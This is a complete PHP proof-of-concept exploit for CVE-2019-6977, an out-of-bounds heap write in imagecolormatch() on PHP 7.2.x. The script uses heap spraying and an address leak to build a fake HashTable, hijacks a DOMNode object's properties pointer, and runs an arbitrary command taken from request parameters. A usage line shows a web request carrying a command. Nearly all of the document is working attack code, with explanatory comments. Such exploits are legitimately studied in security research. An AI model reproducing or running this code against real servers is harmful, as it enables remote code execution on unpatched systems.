<?php
# imagecolormatch() OOB Heap Write exploit
# https://bugs.php.net/bug.php?id=77270
# CVE-2019-6977
# Charles Fol
# @cfreal_
#
# Usage: GET/POST /exploit.php?f=<system_addr>&c=<command>
# Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
#
# Target: PHP 7.2.x
# Tested on: PHP 7.2.12
#
/*
buf = (unsigned long *)safe_emalloc(sizeof(unsigned long), 5 * im2->colorsTotal, 0);
for (x=0; x<im1->sx; x++) {
for( y=0; y<im1->sy; y++ ) {
color = im2->pixels[y][x];
rgb = im1->tpixels[y][x];
bp = buf + (color * 5);
(*(bp++))++;
*(bp++) += gdTrueColorGetRed(rgb);
*(bp++) += gdTrueColorGetGreen(rgb);
*(bp++) += gdTrueColorGetBlue(rgb);
*(bp++) += gdTrueColorGetAlpha(rgb);
}
The buffer is written to by means of a color being the index:
color = im2->pixels[y][x];
..
bp = buf + (color * 5);
*/
#
# The bug allows us to increment 5 longs located after buf in memory.
# The first long is incremented by one, others by an arbitrary value between 0
# and 0xff.
#
error_reporting(E_ALL);
define('OFFSET_STR_VAL', 0x18);
define('BYTES_PER_COLOR', 0x28);
class Nenuphar extends DOMNode
{
# Add a property so that std.properties is created
function __construct()
{
$this->x = '1';
}
# Define __get
# => ce->ce_flags & ZEND_ACC_USE_GUARDS == ZEND_ACC_USE_GUARDS
# => zend_object_properties_size() == 0
# => sizeof(intern) == 0x50
function __get($x)
{
return $this->$x;
}
}
class Nenuphar2 extends DOMNode
{
function __construct()
{
$this->x = '2';
}
function __get($x)
{
return $this->$x;
}
}
function ptr2str($ptr, $m=8)
{
$out = "";
for ($i=0; $i<$m; $i++)
{
$out .= chr($ptr & 0xff);
$ptr >>= 8;
}
return $out;
}
function str2ptr(&$str, $p, $s=8)
{
$address = 0;
for($j=$p+$s-1;$j>=$p;$j--)
{
$address <<= 8;
$address |= ord($str[$j]);
}
return $address;
}
# Spray stuff so that we get concurrent memory blocks
for($i=0;$i<100;$i++)
${'spray'.$i} = str_repeat(chr($i), 2 * BYTES_PER_COLOR - OFFSET_STR_VAL);
for($i=0;$i<100;$i++)
${'sprayx'.$i} = str_repeat(chr($i), 12 * BYTES_PER_COLOR - OFFSET_STR_VAL);
#
# #1: Address leak
# We want to obtain the address of a string so that we can make
# the Nenuphar.std.properties HashTable* point to it and hence control its
# structure.
#
# We create two images $img1 and $img2, both of 1 pixel.
# The RGB bytes of the pixel of $img1 will be added to OOB memory because we set
# $img2 to have $nb_colors images and we set its only pixel to color number
# $nb_colors.
#
$nb_colors = 12;
$size_buf = $nb_colors * BYTES_PER_COLOR;
# One pixel image so that the double loop iterates only once
$img1 = imagecreatetruecolor(1, 1);
# The three RGB values will be added to OOB memory
# First value (Red) is added to the size of the zend_string structure which
# lays under buf in memory.
$color = imagecolorallocate($img1, 0xFF, 0, 0);
imagefill($img1, 0, 0, $color);
$img2 = imagecreate(1, 1);
# Allocate $nb_colors colors: |buf| = $nb_colors * BYTES_PER_COLOR = 0x1e0
# which puts buf in 0x200 memory blocks
for($i=0;$i<$nb_colors;$i++)
imagecolorallocate($img2, 0, 0, $i);
imagesetpixel($img2, 0, 0, $nb_colors + 1);
# Create a memory layout as such:
# [z: zend_string: 0x200]
# [x: zend_string: 0x200]
# [y: zend_string: 0x200]
$z = str_repeat('Z', $size_buf - OFFSET_STR_VAL);
$x = str_repeat('X', $size_buf - OFFSET_STR_VAL);
$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL);
# Then, we unset z and call imagecolormatch(); buf will be at z's memory
# location during the execution
# [buf: long[] : 0x200]
# [x: zend_string: 0x200]
# [y: zend_string: 0x200]
#
# We can write buf + 0x208 + (0x08 or 0x10 or 0x18)
# buf + 0x208 + 0x08 is X's zend_string.len
unset($z);
imagecolormatch($img1, $img2);
# Now, $x's size has been increased by 0xFF, so we can read further in memory.
#
# Since buf was the last freed block, by unsetting y, we make its first 8 bytes
# point to the old memory location of buf
# [free: 0x200] <-+
# [x: zend_string: 0x200] |
# [free: 0x200] --+
unset($y);
# We can read those bytes because x's size has been increased
$z_address = str2ptr($x, 488) + OFFSET_STR_VAL;
# Reset both these variables so that their slot cannot be "stolen" by other
# allocations
$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL - 8);
# Now that we have z's address, we can make something point to it.
# We create a fake HashTable structure in Z; when the script exits, each element
# of this HashTable will be destroyed by calling ht->pDestructor(element)
# The only element here is a string: "id"
$z =
# refcount
ptr2str(1) .
# u-nTableMask meth
ptr2str(0) .
# Bucket arData
ptr2str($z_address + 0x38) .
# uint32_t nNumUsed;
ptr2str(1, 4) .
# uint32_t nNumOfElements;
ptr2str(1, 4) .
# uint32_t nTableSize
ptr2str(0, 4) .
# uint32_t nInternalPointer
ptr2str(0, 4) .
# zend_long nNextFreeElement
ptr2str(0x4242424242424242) .
# dtor_func_t pDestructor
ptr2str(hexdec($_REQUEST['f'])) .
str_pad($_REQUEST['c'], 0x100, "\x00") .
ptr2str(0, strlen($y) - 0x38 - 0x100);
;
# At this point we control a string $z and we know its address: we'll make an
# internal PHP HashTable structure point to it.
#
# #2: Read Nenuphar.std.properties
#
# The tricky part here was to find an interesting PHP structure that is
# allocated in the same fastbins as buf, so that we can modify one of its
# internal pointers. Since buf has to be a multiple of 0x28, I used dom_object,
# whose size is 0x50 = 0x28 * 2. Nenuphar is a subclass of dom_object with just
# one extra method, __get().
# php_dom.c:1074: dom_object *intern = ecalloc(1, sizeof(dom_object) + zend_object_properties_size(class_type));
# Since we defined a __get() method, zend_object_properties_size(class_type) = 0
# and not -0x10.
#
# zend_object.properties points to an HashTable. Controlling an HashTable in PHP
# means code execution since at the end of the script, every element of an HT is
# destroyed by calling ht.pDestructor(ht.arData[i]).
# Hence, we want to change the $nenuphar.std.properties pointer.
#
# To proceed, we first read $nenuphar.std.properties, and then increment it
# by triggering the bug several times, until
# $nenuphar.std.properties == $z_address
#
# Sadly, $nenuphar.std.ce will also get incremented by one every time we trigger
# the bug. This is due to (*(bp++))++ (in gdImageColorMatch).
# To circumvent this problem, we create two classes, Nenuphar and Nenuphar2, and
# instanciate them as $nenuphar and $nenuphar2. After we're done changing the
# std.properties pointer, we trigger the bug more times, until
# $nenuphar.std.ce == $nenuphar2.std.ce2
#
# This way, $nenuphar will have an arbitrary std.properties pointer, and its
# std.ce will be valid.
#
# Afterwards, we let the script exit, which will destroy our fake hashtable (Z),
# and therefore call our arbitrary function.
#
# Here we want fastbins of size 0x50 to match dom_object's size
$nb_colors = 2;
$size_buf = $nb_colors * BYTES_PER_COLOR;
$img1 = imagecreatetruecolor(1, 1);
# The three RGB values will be added to OOB memory
# Second value (Green) is added to the size of the zend_string structure which
# lays under buf in memory.
$color = imagecolorallocate($img1, 0, 0xFF, 0);
imagefill($img1, 0, 0, $color);
# Allocate 2 colors so that |buf| = 2 * 0x28 = 0x50
$img2 = imagecreate(1, 1);
for($i=0;$i<$nb_colors;$i++)
imagecolorallocate($img2, 0, 0, $i);
$y = str_repeat('Y', $size_buf - OFFSET_STR_VAL - 8);
$x = str_repeat('X', $size_buf - OFFSET_STR_VAL - 8);
$nenuphar = new Nenuphar();
$nenuphar2 = new Nenuphar2();
imagesetpixel($img2, 0, 0, $nb_colors);
# Unsetting the first string so that buf takes its place
unset($y);
# Trigger the bug: $x's size is increased by 0xFF
imagecolormatch($img1, $img2);
$ce1_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x28);
$ce2_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + $size_buf + 0x28);
$props_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x38);
print('Nenuphar.ce: 0x' . dechex($ce1_address) . "\n");
print('Nenuphar2.ce: 0x' . dechex($ce2_address) . "\n");
print('Nenuphar.properties: 0x' . dechex($props_address) . "\n");
print('z.val: 0x' . dechex($z_address) . "\n");
print('Difference: 0x' . dechex($z_address-$props_address) . "\n");
if(
$ce2_address - $ce1_address < ($z_address-$props_address) / 0xff ||
$z_address - $props_address < 0
)
{
print('That won\'t work');
exit(0);
}
#
# #3: Modifying Nenuphar.std.properties and Nenuphar.std.ce
#
# Each time we increment Nenuphar.properties by an arbitrary value, ce1_address
# is also incremented by one because of (*(bp++))++;
# Therefore after we're done incrementing props_address to z_address we need
# to increment ce1's address one by one until Nenuphar1.ce == Nenuphar2.ce
# The memory structure we have ATM is OK. We can just trigger the bug again
# until Nenuphar.properties == z_address
$color = imagecolorallocate($img1, 0, 0xFF, 0);
imagefill($img1, 0, 0, $color);
imagesetpixel($img2, 0, 0, $nb_colors + 3);
for($current=$props_address+0xFF;$current<=$z_address;$current+=0xFF)
{
imagecolormatch($img1, $img2);
$ce1_address++;
}
$color = imagecolorallocate($img1, 0, $z_address-$current+0xff, 0);
imagefill($img1, 0, 0, $color);
$current = imagecolormatch($img1, $img2);
$ce1_address++;
# Since we don't want to touch other values, only increase the first one, we set
# the three colors to 0
$color = imagecolorallocate($img1, 0, 0, 0);
imagefill($img1, 0, 0, $color);
# Trigger the bug once to increment ce1 by one.
while($ce1_address++ < $ce2_address)
{
imagecolormatch($img1, $img2);
}
# Read the string again to see if we were successful
$new_ce1_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x28);
$new_props_address = str2ptr($x, $size_buf - OFFSET_STR_VAL + 0x38);
if($new_ce1_address == $ce2_address && $new_props_address == $z_address)
{
print("\nExploit SUCCESSFUL !\n");
}
else
{
print('NEW Nenuphar.ce: 0x' . dechex($new_ce1_address) . "\n");
print('NEW Nenuphar.std.properties: 0x' . dechex($new_props_address) . "\n");
print("\nExploit FAILED !\n");
}